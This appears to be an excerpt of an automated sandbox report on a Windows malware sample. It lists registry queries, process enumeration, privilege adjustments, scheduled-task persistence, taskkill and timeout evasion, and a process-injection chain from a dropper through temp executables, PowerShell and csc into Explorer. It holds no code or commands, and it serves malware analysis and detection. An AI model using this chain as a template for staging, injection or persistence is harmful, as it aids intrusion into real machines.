Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\nxpsp\mcsq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
PID 1664 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
PID 1664 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
PID 1660 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1660 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1660 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2668 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2668 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1620 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1620 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 5036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4476 wrote to memory of 5036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 116 wrote to memory of 972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 972 wrote to memory of 5108 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 972 wrote to memory of 5108 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 116 wrote to memory of 3432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2668 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2668 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2036 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 2036 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 2668 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2668 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2668 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
